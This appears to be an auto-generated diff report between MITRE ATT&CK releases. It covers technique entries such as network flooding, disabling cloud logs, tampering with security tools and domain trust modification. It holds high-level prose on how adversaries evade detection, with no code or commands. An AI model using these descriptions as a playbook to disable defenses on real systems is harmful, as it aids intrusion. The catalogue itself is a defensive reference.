descriptionAdversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001) are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)Adversaries may attempt to cause a denial of service (DoS) by directly sending a high-volume of network traffic to a target. This DoS attack may also reduce the availability and functionality of the targeted system(s) and network. [Direct Network Flood](https://attack.mitre.org/techniques/T1498/001)s are when one or more systems are used to send a high-volume of network packets towards the targeted service's network. Almost any network protocol may be used for flooding. Stateless protocols such as UDP or ICMP are commonly used but stateful protocols such as TCP can be used as well. Botnets are commonly used to conduct network flooding attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global Internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for distributed DoS (DDoS), so many systems are used to generate the flood that each one only needs to send out a small amount of traffic to produce enough volume to saturate the target network. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS flooding attacks, such as the 2012 series of incidents that targeted major US banks.(Citation: USNYAG IranianBotnet March 2016)
external_references[1]['source_name']capecCisco DoSdetectNetflow
external_references[1]['url']https://capec.mitre.org/data/definitions/125.htmlhttps://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
external_references[2]['source_name']capecUSNYAG IranianBotnet March 2016
external_references[2]['url']https://capec.mitre.org/data/definitions/486.htmlhttps://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-charged
external_references[3]['source_name']USNYAG IranianBotnet March 2016capec
external_references[3]['url']https://www.justice.gov/opa/pr/seven-iranians-working-islamic-revolutionary-guard-corps-affiliated-entities-chargedhttps://capec.mitre.org/data/definitions/125.html
external_references[4]['source_name']Cisco DoSdetectNetflowcapec
external_references[4]['url']https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdfhttps://capec.mitre.org/data/definitions/486.html
x_mitre_version1.21.3

[T1562.008] Impair Defenses: Disable Cloud Logs

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1An adversary may disable cloud logging capabilities and intet1An adversary may disable cloud logging capabilities and inte
>grations to limit what data is collected on their activities>grations to limit what data is collected on their activities
> and avoid detection.   Cloud environments allow for collect> and avoid detection.   Cloud environments allow for collect
>ion and analysis of audit and application logs that provide >ion and analysis of audit and application logs that provide 
>insight into what activities a user does within the environm>insight into what activities a user does within the environm
>ent. If an attacker has sufficient permissions, they can dis>ent. If an adversary has sufficient permissions, they can di
>able logging to avoid detection of their activities. For exa>sable logging to avoid detection of their activities. For ex
>mple, in AWS an adversary may disable CloudWatch/CloudTrail >ample, in AWS an adversary may disable CloudWatch/CloudTrail
>integrations prior to conducting further malicious activity.> integrations prior to conducting further malicious activity
>(Citation: Following the CloudTrail: Generating strong AWS s>.(Citation: Following the CloudTrail: Generating strong AWS 
>ecurity signals with Sumo Logic)>security signals with Sumo Logic)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-03-15 16:43:04.273000+00:002022-03-08 21:55:27.505000+00:00
descriptionAn adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)
x_mitre_contributors[2]Sekhar Sarukkai, McAfee Sekhar Sarukkai, McAfee
x_mitre_data_sources[0]Cloud Service: Cloud Service ModificationCloud Service: Cloud Service Disable
x_mitre_data_sources[1]Cloud Service: Cloud Service DisableCloud Service: Cloud Service Modification
x_mitre_version1.11.2

[T1562.001] Impair Defenses: Disable or Modify Tools

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may modify and/or disable security tools to avoit1Adversaries may modify and/or disable security tools to avoi
>d possible detection of their malware/tools and activities. >d possible detection of their malware/tools and activities. 
>This may take the many forms, such as killing security softw>This may take many forms, such as killing security software 
>are processes or services, modifying / deleting Registry key>processes or services, modifying / deleting Registry keys or
>s or configuration files so that tools do not operate proper> configuration files so that tools do not operate properly, 
>ly, or other methods to interfere with security tools scanni>or other methods to interfere with security tools scanning o
>ng or reporting information.  Adversaries may also tamper wi>r reporting information. Adversaries may also disable update
>th artifacts deployed and utilized by security tools. Securi>s to prevent the latest security patches from reaching tools
>ty tools may make dynamic changes to system components in or> on victim systems.(Citation: SCADAfence_ransomware)  Advers
>der to maintain visibility into specific events. For example>aries may also tamper with artifacts deployed and utilized b
>, security products may load their own modules and/or modify>y security tools. Security tools may make dynamic changes to
> those loaded by processes to facilitate data collection. Si> system components in order to maintain visibility into spec
>milar to [Indicator Blocking](https://attack.mitre.org/techn>ific events. For example, security products may load their o
>iques/T1562/006), adversaries may unhook or otherwise modify>wn modules and/or modify those loaded by processes to facili
> these features added by tools (especially those that exist >tate data collection. Similar to [Indicator Blocking](https:
>in userland or are otherwise potentially accessible to adver>//attack.mitre.org/techniques/T1562/006), adversaries may un
>saries) to avoid detection.(Citation: OutFlank System Calls)>hook or otherwise modify these features added by tools (espe
>(Citation: MDSec System Calls)>cially those that exist in userland or are otherwise potenti
 >ally accessible to adversaries) to avoid detection.(Citation
 >: OutFlank System Calls)(Citation: MDSec System Calls)  In c
 >loud environments, tools disabled by adversaries may include
 > cloud monitoring agents that report back to services such a
 >s AWS CloudWatch or Google Cloud Monitor.  Furthermore, alth
 >ough defensive tools may have anti-tampering mechanisms, adv
 >ersaries may abuse tools such as legitimate rootkit removal 
 >kits to impair and/or disable these tools.(Citation: chasing
 >_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: 
 >demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For e
 >xample, adversaries have used tools such as GMER to find and
 > shut down hidden processes and antivirus software on infect
 >ed systems.(Citation: demystifying_ryuk)  Additionally, adve
 >rsaries may exploit legitimate drivers from anti-virus softw
 >are to gain access to kernel space (i.e. [Exploitation for P
 >rivilege Escalation](https://attack.mitre.org/techniques/T10
 >68)), which may lead to bypassing anti-tampering features.(C
 >itation: avoslocker_ransomware)

New Mitigations:

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesde Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
external_referencesCAPEC-578
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 21:27:48.159000+00:002022-10-24 15:23:59.433000+00:00
descriptionAdversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take the many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware) Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls) In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor. Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk) Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)
external_references[1]['source_name']capecOutFlank System Calls
external_references[1]['url']https://capec.mitre.org/data/definitions/578.htmlhttps://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/
external_references[2]['source_name']OutFlank System Callschasing_avaddon_ransomware
external_references[2]['description']de Plaa, C. (2019, June 19). Red Team Tactics: Combining Direct System Calls and sRDI to bypass AV/EDR. Retrieved September 29, 2021.Hernandez, A. S. Tarter, P. Ocamp, E. J. (2022, January 19). One Source to Rule Them All: Chasing AVADDON Ransomware. Retrieved January 26, 2022.
external_references[2]['url']https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/https://www.mandiant.com/resources/chasing-avaddon-ransomware
external_references[3]['source_name']MDSec System Callsdoppelpaymer_crowdstrike
external_references[3]['description']MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.Hurley, S. (2021, December 7). Critical Hit: How DoppelPaymer Hunts and Kills Windows Processes. Retrieved January 26, 2022.
external_references[3]['url']https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/
x_mitre_version1.21.3
x_mitre_data_sources[5]Sensor Health: Host StatusService: Service Metadata
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'avoslocker_ransomware', 'description': 'Lakshmanan, R. (2022, May 2). AvosLocker Ransomware Variant Using New Trick to Disable Antivirus Protection. Retrieved May 17, 2022.', 'url': 'https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html'}
external_references{'source_name': 'dharma_ransomware', 'description': 'Loui, E. Scheuerman, K. et al. (2020, April 16). Targeted Dharma Ransomware Intrusions Exhibit Consistent Techniques. Retrieved January 26, 2022.', 'url': 'https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/'}
external_references{'source_name': 'MDSec System Calls', 'description': 'MDSec Research. (2020, December). Bypassing User-Mode Hooks and Direct Invocation of System Calls for Red Teams. Retrieved September 29, 2021.', 'url': 'https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/'}
external_references{'source_name': 'SCADAfence_ransomware', 'description': 'Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.', 'url': 'https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf'}
external_references{'source_name': 'demystifying_ryuk', 'description': 'Tran, T. (2020, November 24). Demystifying Ransomware Attacks Against Microsoft Defender Solution. Retrieved January 26, 2022.', 'url': 'https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947'}
external_references{'source_name': 'capec', 'url': 'https://capec.mitre.org/data/definitions/578.html', 'external_id': 'CAPEC-578'}
x_mitre_contributorsDaniel Feichter, @VirtualAllocEx, Infosec Tirol
x_mitre_contributorsLucas Heiligenstein
x_mitre_contributorsCian Heasley
x_mitre_contributorsAlex Soler, AttackIQ
x_mitre_contributorsSarathkumar Rajendran, Microsoft Defender365
x_mitre_data_sourcesSensor Health: Host Status
x_mitre_data_sourcesDriver: Driver Load
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesService: Service Metadata

[T1087.002] Account Discovery: Domain Account

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['ExtraHop', 'Miriam Wiesner, @miriamxyra, Microsoft Security']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-10-13 14:05:14.784000+00:002022-08-25 13:04:00.863000+00:00
x_mitre_data_sources[0]Process: Process CreationGroup: Group Enumeration
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesGroup: Group Enumeration
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_data_sourcesNetwork Traffic: Network Traffic Content
x_mitre_data_sourcesProcess: Process Creation

[T1069.002] Permission Groups Discovery: Domain Groups

Current version: 1.1

Version changed from: 1.0 → 1.1

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Harshal Tupsamudre, Qualys', 'Miriam Wiesner, @miriamxyra, Microsoft Security']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-03-12 19:07:53.043000+00:002022-10-21 12:55:51.337000+00:00
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesGroup: Group Enumeration
x_mitre_data_sourcesProcess: OS API Execution

[T1590.001] Gather Victim Network Information: Domain Properties

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may gather information about the victim's networt1Adversaries may gather information about the victim's networ
>k domain(s) that can be used during targeting. Information a>k domain(s) that can be used during targeting. Information a
>bout domains and their properties may include a variety of d>bout domains and their properties may include a variety of d
>etails, including what domain(s) the victim owns as well as >etails, including what domain(s) the victim owns as well as 
>administrative data (ex: name, registrar, etc.) and more dir>administrative data (ex: name, registrar, etc.) and more dir
>ectly actionable information such as contacts (email address>ectly actionable information such as contacts (email address
>es and phone numbers), business addresses, and name servers.>es and phone numbers), business addresses, and name servers.
>  Adversaries may gather this information in various ways, s>  Adversaries may gather this information in various ways, s
>uch as direct collection actions via [Active Scanning](https>uch as direct collection actions via [Active Scanning](https
>://attack.mitre.org/techniques/T1595) or [Phishing for Infor>://attack.mitre.org/techniques/T1595) or [Phishing for Infor
>mation](https://attack.mitre.org/techniques/T1598). Informat>mation](https://attack.mitre.org/techniques/T1598). Informat
>ion about victim domains and their properties may also be ex>ion about victim domains and their properties may also be ex
>posed to adversaries via online or other accessible data set>posed to adversaries via online or other accessible data set
>s (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002>s (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002
>)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl>)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl
> Passive DNS) Gathering this information mareveal opportun> Passive DNS) Where third-party cloud providers are in use, 
>ities for other forms of reconnaissance (ex: [Search Open Te>this information may also be exposed through publicly availa
>chnical Databases](https://attack.mitre.org/techniques/T1596>ble API endpoints, such as GetUserRealm and autodiscover in 
>), [Search Open Websites/Domains](https://attack.mitre.org/t>Office 365 environments.(Citation: Azure Active DirectorRe
>echniques/T1593), or [Phishing for Information](https://atta>connaisance)(Citation: Office 265 Azure Domain Availability)
>ck.mitre.org/techniques/T1598)), establishing operational re> Gathering this information may reveal opportunities for oth
>sources (ex: [Acquire Infrastructure](https://attack.mitre.o>er forms of reconnaissance (ex: [Search Open Technical Datab
>rg/techniques/T1583) or [Compromise Infrastructure](https://>ases](https://attack.mitre.org/techniques/T1596), [Search Op
>attack.mitre.org/techniques/T1584)), and/or initial access (>en Websites/Domains](https://attack.mitre.org/techniques/T15
>ex: [Phishing](https://attack.mitre.org/techniques/T1566)).>93), or [Phishing for Information](https://attack.mitre.org/
 >techniques/T1598)), establishing operational resources (ex: 
 >[Acquire Infrastructure](https://attack.mitre.org/techniques
 >/T1583) or [Compromise Infrastructure](https://attack.mitre.
 >org/techniques/T1584)), and/or initial access (ex: [Phishing
 >](https://attack.mitre.org/techniques/T1566)).
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_contributors['Jannie Li, Microsoft Threat Intelligence\u202fCenter\u202f(MSTIC)']
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-04-15 03:30:33.508000+00:002022-10-21 14:32:05.257000+00:00
descriptionAdversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).Adversaries may gather information about the victim's network domain(s) that can be used during targeting. Information about domains and their properties may include a variety of details, including what domain(s) the victim owns as well as administrative data (ex: name, registrar, etc.) and more directly actionable information such as contacts (email addresses and phone numbers), business addresses, and name servers. Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about victim domains and their properties may also be exposed to adversaries via online or other accessible data sets (ex: [WHOIS](https://attack.mitre.org/techniques/T1596/002)).(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Where third-party cloud providers are in use, this information may also be exposed through publicly available API endpoints, such as GetUserRealm and autodiscover in Office 365 environments.(Citation: Azure Active Directory Reconnaisance)(Citation: Office 265 Azure Domain Availability) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596), [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593), or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).
external_references[1]['source_name']WHOISCircl Passive DNS
external_references[1]['description']NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.
external_references[1]['url']https://www.whois.net/https://www.circl.lu/services/passive-dns/
external_references[2]['source_name']DNS DumpsterAzure Active Directory Reconnaisance
external_references[2]['description']Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.Dr. Nestori Syynimaa. (2020, June 13). Just looking: Azure Active Directory reconnaissance as an outsider. Retrieved May 27, 2022.
external_references[2]['url']https://dnsdumpster.com/https://o365blog.com/post/just-looking/
external_references[3]['source_name']Circl Passive DNSDNS Dumpster
external_references[3]['description']CIRCL Computer Incident Response Center. (n.d.). Passive DNS. Retrieved October 20, 2020.Hacker Target. (n.d.). DNS Dumpster. Retrieved October 20, 2020.
external_references[3]['url']https://www.circl.lu/services/passive-dns/https://dnsdumpster.com/
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Office 265 Azure Domain Availability', 'description': 'Microsoft. (2017, January 23). (Cloud) Tip of the Day: Advanced way to check domain availability for Office 365 and Azure. Retrieved May 27, 2022.', 'url': 'https://docs.microsoft.com/en-us/archive/blogs/tip_of_the_day/cloud-tip-of-the-day-advanced-way-to-check-domain-availability-for-office-365-and-azure'}
external_references{'source_name': 'WHOIS', 'description': 'NTT America. (n.d.). Whois Lookup. Retrieved October 20, 2020.', 'url': 'https://www.whois.net/'}

[T1482] Domain Trust Discovery

Current version: 1.2

Version changed from: 1.1 → 1.2

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2020-09-17 18:26:17.858000+00:002022-06-16 19:18:22.305000+00:00
external_references[1]['source_name']Microsoft TrustsMicrosoft Operation Wilysupply
external_references[1]['description']Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.
external_references[1]['url']https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/
external_references[3]['source_name']Harmj0y Domain TrustsMicrosoft Trusts
external_references[3]['description']Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.Microsoft. (2009, October 7). Trust Technologies. Retrieved February 14, 2019.
external_references[3]['url']http://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)
external_references[4]['source_name']Microsoft Operation WilysupplyMicrosoft GetAllTrustRelationships
external_references[4]['description']Florio, E.. (2017, May 4). Windows Defender ATP thwarts Operation WilySupply software supply chain cyberattack. Retrieved February 14, 2019.Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.
external_references[4]['url']https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships
external_references[5]['source_name']Microsoft GetAllTrustRelationshipsHarmj0y Domain Trusts
external_references[5]['description']Microsoft. (n.d.). Domain.GetAllTrustRelationships Method. Retrieved February 14, 2019.Schroeder, W. (2017, October 30). A Guide to Attacking Domain Trusts. Retrieved February 14, 2019.
external_references[5]['url']https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationshipshttps://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944
x_mitre_data_sources[0]Process: Process CreationNetwork Traffic: Network Traffic Content
x_mitre_data_sources[1]Command: Command ExecutionProcess: OS API Execution
x_mitre_data_sources[2]Process: OS API ExecutionScript: Script Execution
x_mitre_data_sources[3]Script: Script ExecutionProcess: Process Creation
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsExtraHop
x_mitre_data_sourcesCommand: Command Execution

[T1484.002] Domain Policy Modification: Domain Trust Modification

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may add new domain trusts or modify the propertit1Adversaries may add new domain trusts or modify the properti
>es of existing domain trusts to evade defenses and/or elevat>es of existing domain trusts to evade defenses and/or elevat
>e privileges. Domain trust details, such as whether or not a>e privileges. Domain trust details, such as whether or not a
> domain is federated, allow authentication and authorization> domain is federated, allow authentication and authorization
> properties to apply between domains for the purpose of acce> properties to apply between domains for the purpose of acce
>ssing shared resources.(Citation: Microsoft - Azure AD Feder>ssing shared resources.(Citation: Microsoft - Azure AD Feder
>ation) These trust objects may include accounts, credentials>ation) These trust objects may include accounts, credentials
>, and other authentication material applied to servers, toke>, and other authentication material applied to servers, toke
>ns, and domains.  Manipulating the domain trusts may allow a>ns, and domains.  Manipulating the domain trusts may allow a
>n adversary to escalate privileges and/or evade defenses by >n adversary to escalate privileges and/or evade defenses by 
>modifying settings to add objects which they control. For ex>modifying settings to add objects which they control. For ex
>ample, this may be used to forge [SAML Tokens](https://attac>ample, this may be used to forge [SAML Tokens](https://attac
>k.mitre.org/techniques/T1606/002), without the need to compr>k.mitre.org/techniques/T1606/002), without the need to compr
>omise the signing certificate to forge new credentials. Inst>omise the signing certificate to forge new credentials. Inst
>ead, an adversary can manipulate domain trusts to add their >ead, an adversary can manipulate domain trusts to add their 
>own signing certificate.>own signing certificate. An adversary may also convert a dom
 >ain to a federated domain, which may enable malicious trust 
 >modifications such as altering the claim issuance rules to l
 >og in any valid set of credentials as a specified user.(Cita
 >tion: AADInternals zure AD Federated Domain) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-01-11 18:21:20.213000+00:002022-10-21 16:09:14.555000+00:00
descriptionAdversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate.Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains. Manipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain)
external_references[1]['source_name']Microsoft - Azure AD FederationCISA SolarWinds Cloud Detection
external_references[1]['description']Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.
external_references[1]['url']https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fedhttps://us-cert.cisa.gov/ncas/alerts/aa21-008a
external_references[2]['source_name']Microsoft - Azure Sentinel ADFSDomainTrustModsAADInternals zure AD Federated Domain
